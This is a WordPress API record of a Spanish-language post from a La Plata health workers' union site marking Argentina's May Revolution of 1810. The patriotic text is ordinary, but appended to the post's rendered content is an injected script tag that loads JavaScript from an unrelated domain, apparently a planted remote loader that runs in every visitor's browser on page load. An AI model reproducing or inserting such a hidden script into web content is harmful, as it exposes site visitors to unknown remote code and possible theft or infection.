{"id":18484,"date":"2025-05-25T00:00:00","date_gmt":"2025-05-25T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18484"},"modified":"2026-02-02T17:05:23","modified_gmt":"2026-02-02T20:05:23","slug":"dia-de-la-revolucion-de-mayo-2","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/dia-de-la-revolucion-de-mayo-2\/","title":{"rendered":"D\u00eda de la Revoluci\u00f3n de Mayo"},"content":{"rendered":"\n<p>\ud83c\udde6\ud83c\uddf7El 25 de mayo es una de las fechas patrias m\u00e1s importantes para la Rep\u00fablica Argentina, ya que conmemora la Revoluci\u00f3n de Mayo, una gesta que concluy\u00f3 en la constituci\u00f3n de la Primera Junta de Gobierno que depuso la autoridad del virrey espa\u00f1ol Baltasar Hidalgo de Cisneros sobre el Virreinato del R\u00edo de la Plata.<\/p>\n\n\n\n<p>Los eventos que concluyeron &#8211; un d\u00eda como hoy- pero de 1810, ocurrieron durante la denominada \u00abSemana de Mayo\u00bb, cuando los patriotas tomaron el control del Gobierno.<\/p>\n\n\n\n<p>La formaci\u00f3n de la Primera Junta de Gobierno fue un paso crucial en la creaci\u00f3n del Estado argentino, y sent\u00f3 las bases para la proclamaci\u00f3n de la independencia seis a\u00f1os despu\u00e9s.<\/p>\n\n\n\n<p>Este fue el inicio del proceso de surgimiento del Estado Argentino, que proclamara su independencia reci\u00e9n 6 a\u00f1os despu\u00e9s, el 9 de julio de 1816.<\/p>\n\n\n\n<p>Secretar\u00eda de Cultura, Ledys Udaquiola.<\/p>\n\n\n\n<p>#SanidadATSALaPlata #SiempreJuntoAVos #revoluciondemayo<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83c\udde6\ud83c\uddf7El 25 de mayo es una de las fechas patrias m\u00e1s importantes para la Rep\u00fablica&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18485,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18484","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18484"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18484\/revisions"}],"predecessor-version":[{"id":20807,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18484\/revisions\/20807"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18485"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18484"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}